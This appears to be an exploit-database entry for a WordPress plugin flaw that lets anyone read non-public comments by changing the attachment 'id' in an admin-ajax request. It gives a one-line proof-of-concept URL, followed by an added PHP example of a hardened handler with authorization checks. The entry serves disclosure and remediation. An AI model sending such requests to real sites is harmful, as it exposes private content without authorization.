## https://sploitus.com/exploit?id=WPEX-ID:08A8A51C-49D3-4BCE-B7E0-E365AF1D8F33
By changing the "id" parameter of the POST request to a valid media attachment id on a page/post that was not public, it was possible to leak the non-public comments.

```
http://example.com/wp-admin/admin-ajax.php?action=get_attachment_comments&nonce=4aadefa6ee&id=28&offset=0
```
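The missing control is an authorization check on the attachment `id` before its comments are returned. The following is an added example of a hardened handler for this AJAX action, not the affected plugin's code and not part of the original entry. The function names, the nonce action string `example_attachment_comments`, the page size of 10, and the registration for logged-out users are assumptions; `is_post_publicly_viewable()` requires WordPress 5.7 or later.

```php
<?php
// Added example: hypothetical hardened handler, not the affected plugin's code.
// Function names and the nonce action string are assumptions.

function example_can_view_attachment_comments( $attachment_id ) {
    $attachment = get_post( $attachment_id );
    if ( ! $attachment || 'attachment' !== $attachment->post_type ) {
        return false;
    }
    // Conservative choice: never serve comments while the parent's password is unmet.
    if ( $attachment->post_parent && post_password_required( $attachment->post_parent ) ) {
        return false;
    }
    // For an attachment with status "inherit", get_post_status() resolves to the
    // parent's status, so both checks below follow the parent page/post.
    if ( is_post_publicly_viewable( $attachment ) ) {
        return true;
    }
    return current_user_can( 'read_post', $attachment_id );
}

function example_get_attachment_comments() {
    // A nonce only ties the request to a rendered page; it is not an access check.
    check_ajax_referer( 'example_attachment_comments', 'nonce' );

    $id     = isset( $_REQUEST['id'] ) ? absint( $_REQUEST['id'] ) : 0;
    $offset = isset( $_REQUEST['offset'] ) ? absint( $_REQUEST['offset'] ) : 0;

    if ( ! example_can_view_attachment_comments( $id ) ) {
        // Same response for "missing" and "not allowed" so ids cannot be probed.
        wp_send_json_error( array( 'message' => 'Not found' ), 404 );
    }

    $comments = get_comments( array(
        'post_id' => $id,
        'status'  => 'approve',
        'number'  => 10,
        'offset'  => $offset,
    ) );
    wp_send_json_success( wp_list_pluck( $comments, 'comment_content', 'comment_ID' ) );
}
add_action( 'wp_ajax_get_attachment_comments', 'example_get_attachment_comments' );
add_action( 'wp_ajax_nopriv_get_attachment_comments', 'example_get_attachment_comments' );
```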